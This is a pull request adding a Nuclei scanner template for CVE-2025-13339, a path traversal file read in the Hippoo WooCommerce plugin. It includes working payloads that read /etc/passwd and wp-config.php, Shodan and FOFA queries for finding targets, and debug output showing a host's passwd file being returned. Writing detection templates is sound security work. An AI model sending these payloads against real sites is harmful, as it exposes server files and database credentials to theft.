### PR TITLE
Create CVE-2025-13339.yaml

### DIFF
--- a/http/cves/2025/CVE-2025-13339.yaml
+++ b/http/cves/2025/CVE-2025-13339.yaml
@@ -1,0 +1,46 @@
+id: CVE-2025-13339
+
+info:
+  name: Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read
+  author: pussycat0x
+  severity: high
+  description: |
+    The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to and including 1.7.1 via the template_redirect() function. The plugin registers 'hippoo_serve' as a WordPress query variable and uses it to serve PWA files from the pwa/ directory. In vulnerable versions, the user-supplied value is concatenated directly into a filesystem path without any sanitization or directory confinement check, then passed to readfile(). This allows unauthenticated attackers to read arbitrary files on the server by injecting directory traversal sequences (../).
+  impact: |
+    An unauthenticated attacker can read any file readable by the web server process (www-data), including wp-config.php (database credentials, authentication keys and salts), /etc/passwd, server configuration files, and application source code. Exfiltration of wp-config.php alone enables database compromise and WordPress cookie forgery for full site takeover.
+  remediation: Update the Hippoo Mobile App for WooCommerce plugin to version 1.7.2 or later. The patch adds realpath() canonicalization and a strpos() prefix check to confine file reads to the pwa/ directory.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hippoo/hippoo-mobile-app-for-woocommerce-171-unauthenticated-arbitrary-file-read
+    - https://plugins.trac.wordpress.org/changeset/3412701/
+    - https://patchstack.com/database/wordpress/plugin/hippoo/vulnerability/wordpress-hippoo-mobile-app-for-woocommerce-plugin-1-7-1-unauthenticated-arbitrary-file-read-vulnerability
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2025-13339
+    cwe-id: CWE-22
+    epss-score: 0.00134
+    epss-percentile: 0.49425
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: hippoo
+    product: hippoo-mobile-app-for-woocommerce
+    framework: wordpress
+    shodan-query: http.component:"WordPress"
+    fofa-query: body="hippoo"
+  tags: cve,cve2025,wordpress,wp-plugin,hippoo,lfi,woocommerce
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?hippoo_serve=../../../../../../../etc/passwd"
+      - "{{BaseURL}}/?hippoo_serve=../../../../wp-config.php"
+
+    stop-at-first-match: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "regex('root:.*:0:0:', body) || contains_all(body, 'DB_NAME', 'DB_PASSWORD')"
+          - "status_code == 200"
+        condition: and


### PR DESCRIPTION
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

###Debug DATA

```
nuclei -u http://25z15pdhnbcbdu9tkwftxoolcb0cupiw.tryneoai.com -t fp1.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.9.0

                projectdiscovery.io

[INF] Current nuclei version: v3.9.0 (latest)
[INF] Current nuclei-templates version: v10.4.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 179
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-13339] Dumped HTTP request for http://25z15pdhnbcbdu9tkwftxoolcb0cupiw.tryneoai.com/?hippoo_serve=../../../../../../../etc/passwd

GET /?hippoo_serve=../../../../../../../etc/passwd HTTP/1.1
Host: 25z15pdhnbcbdu9tkwftxoolcb0cupiw.tryneoai.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2025-13339] Dumped HTTP response http://25z15pdhnbcbdu9tkwftxoolcb0cupiw.tryneoai.com/?hippoo_serve=../../../../../../../etc/passwd

HTTP/1.1 200 OK
Connection: close
Content-Length: 894
Content-Type: application/octet-stream
Date: Thu, 11 Jun 2026 04:50:22 GMT
Server: Apache/2.4.66 (Debian)
X-Powered-By: PHP/8.3.30

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
mysql:x:100:101:MariaDB Server:/nonexistent:/bin/false
[CVE-2025-13339:dsl-1] [http] [high] http://25z15pdhnbcbdu9tkwftxoolcb0cupiw.tryneoai.com/?hippoo_serve=../../../../../../../etc/passwd
[INF] Scan completed in 2.47748525s. 1 matches found.
```

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
